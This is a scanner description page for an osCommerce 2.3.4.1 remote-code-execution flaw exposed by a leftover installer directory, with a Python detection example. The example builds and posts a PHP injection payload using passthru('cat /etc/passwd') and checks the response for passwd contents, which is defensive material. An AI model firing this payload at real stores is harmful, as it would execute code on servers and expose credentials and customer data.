S4E

CVE-2018-25114 Scanner

CVE-2018-25114 Scanner - Remote Code Execution vulnerability in osCommerce

Short Info

Level: Critical
Scan type: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 23 days 6 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

osCommerce Online Merchant is an open-source shopping cart solution used by businesses of all sizes to run e-commerce storefronts. Developed and maintained by a global community, it is an alternative to proprietary shopping cart software and lets a business set up a customizable, scalable online store. It is popular with small and medium-sized merchants because of its flexibility and large support community. It handles product listings, customer orders and online payments, which is why correct installation and post-installation configuration matter: an incomplete setup leaves the whole store exposed.

Remote Code Execution (RCE) is a critical vulnerability class in which an attacker makes a vulnerable server run code of the attacker's choosing. In web applications it frequently stems from functionality that was never meant to be reachable by anonymous users, such as an installer, remaining accessible without authentication. In this instance, if the osCommerce installation files are left in place after setup, the vulnerability can be exploited with a single unauthenticated request. Successful exploitation gives the attacker the privileges of the web server process, which typically means access to the store's database credentials and customer data and often a path to full system compromise. RCE is treated as a top-severity issue because it can both disrupt services and exfiltrate information.

osCommerce 2.3.4.1 is vulnerable to RCE because its installation routine requires no authentication and does not sanitise its inputs. When the '/install/' directory is left intact after initial setup, an unauthenticated user can drive the installer again. Step 4 of the installer ('install_4.php') takes the submitted 'DIR_FS_DOCUMENT_ROOT' value and writes it, unescaped, into a PHP define() in the configuration file it generates. A value that closes the quoted string and appends a call such as 'passthru()' is therefore written out as PHP code and executed as soon as the generated file is loaded. The scanner confirms execution by having the injected command print '/etc/passwd' and then checking the HTTP responses for lines in passwd format (for example the root entry). Note that a successful confirmation rewrites the store's generated configuration file, so the non-intrusive check for an exposed '/install/' directory is the safer first step on a production system.
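The following is an added example, not S4E's scanner code and not osCommerce code. It shows the two stages a practitioner would separate: a non-intrusive check that the installer is still reachable, and the confirmation logic that submits a passthru() payload in DIR_FS_DOCUMENT_ROOT and looks for /etc/passwd content in the responses. The probe paths, the step-4 endpoint, the generated configuration file path, the form fields sent, and the exact quote-breakout shape of the payload are assumptions made for this example; the HTTP layer is injected so the decision logic runs offline against constructed responses.

```python
"""Added example (not S4E's scanner or osCommerce code): exposure check and
confirmation matcher for the osCommerce 2.3.4.1 leftover-installer RCE."""
import re
from typing import Callable, Dict, Optional, Tuple

# fetch(method, path, form) -> (status_code, body). Injected so the logic runs
# offline here; wire it to requests/urllib for a real, authorised target.
Fetcher = Callable[[str, str, Optional[Dict[str, str]]], Tuple[int, str]]

# Assumed installer entry points; none of these should exist after setup.
INSTALL_PROBES = ("/install/", "/install/index.php", "/install/install.php")
# Assumed endpoint for installer step 4 and the file it generates.
STEP4_PATH = "/install/install.php?step=4"
CONFIGURE_PATH = "/install/includes/configure.php"

# /etc/passwd always carries the root entry with uid 0 and gid 0.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def installer_exposed(fetch: Fetcher) -> bool:
    """Non-intrusive check: does any installer page still answer 200?"""
    for path in INSTALL_PROBES:
        status, body = fetch("GET", path, None)
        if status == 200 and "oscommerce" in body.lower():
            return True
    return False


def passwd_leaked(body: str) -> bool:
    """True when an HTTP body contains /etc/passwd-formatted content."""
    return PASSWD_RE.search(body) is not None


def rce_payload(command: str) -> str:
    """DIR_FS_DOCUMENT_ROOT value that closes the single-quoted define()
    string the installer writes, runs `command` via passthru(), and comments
    out the rest of the generated line. The breakout shape is an assumption
    about how install_4.php quotes the value; verify against the source."""
    return "');passthru('" + command + "');/*"


def confirm_rce(fetch: Fetcher) -> bool:
    """Intrusive confirmation. WARNING: success overwrites the store's
    generated configuration file. Only run with explicit authorisation.
    Only the fields relevant to the injection are sent (assumption)."""
    form = {
        "DIR_FS_DOCUMENT_ROOT": rce_payload("cat /etc/passwd"),
        "DIR_WS_HTTP_CATALOG": "/",
    }
    _, body = fetch("POST", STEP4_PATH, form)
    if passwd_leaked(body):
        return True
    # The injected PHP runs when the generated file is loaded.
    _, body = fetch("GET", CONFIGURE_PATH, None)
    return passwd_leaked(body)


def assess(fetch: Fetcher, intrusive: bool = False) -> str:
    """Returns 'clean', 'installer-exposed' or 'rce-confirmed'."""
    if not installer_exposed(fetch):
        return "clean"
    if intrusive and confirm_rce(fetch):
        return "rce-confirmed"
    return "installer-exposed"


# --- constructed responses for an offline demonstration -------------------
INSTALL_PAGE = "<title>osCommerce Online Merchant - Installation</title>"
VULNERABLE_SITE: Dict[Tuple[str, str], Tuple[int, str]] = {
    ("GET", "/install/"): (200, INSTALL_PAGE),
    ("GET", "/install/index.php"): (200, INSTALL_PAGE),
    ("GET", "/install/install.php"): (200, INSTALL_PAGE),
    ("POST", STEP4_PATH): (200, "Installation step 4 complete"),
    ("GET", CONFIGURE_PATH): (
        200,
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    ),
}
# Installer directory deleted after setup: every probe 404s.
HARDENED_SITE: Dict[Tuple[str, str], Tuple[int, str]] = {}


def fake_fetch(site: Dict[Tuple[str, str], Tuple[int, str]]) -> Fetcher:
    """Build a fetcher that answers from a constructed response table."""
    def fetch(method: str, path: str, form: Optional[Dict[str, str]] = None):
        return site.get((method, path), (404, "Not Found"))
    return fetch


if __name__ == "__main__":
    print(assess(fake_fetch(VULNERABLE_SITE), intrusive=True))  # rce-confirmed
    print(assess(fake_fetch(VULNERABLE_SITE)))                  # installer-exposed
    print(assess(fake_fetch(HARDENED_SITE)))                    # clean
```

The split into `installer_exposed` and `confirm_rce` is deliberate: an asset owner can run the first stage on a live store at no risk, while the second stage changes server state and belongs in a controlled test, and a hardened site (installer directory removed) never reaches it.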

Exploitation of this vulnerability can lead to full compromise of the hosting server. Because the injected code runs as the web server user, the attacker can read the store's configuration and database credentials, dump or alter customer and order data, deface the site, or take it offline, with the data breach and financial loss that follow. Once a foothold exists, further payloads such as web shells, worms or ransomware can be deployed, compounding the initial impact. The remediation is the one osCommerce itself expects: delete the '/install/' directory (or deny web access to it) as soon as installation is complete, and verify that it no longer answers requests.
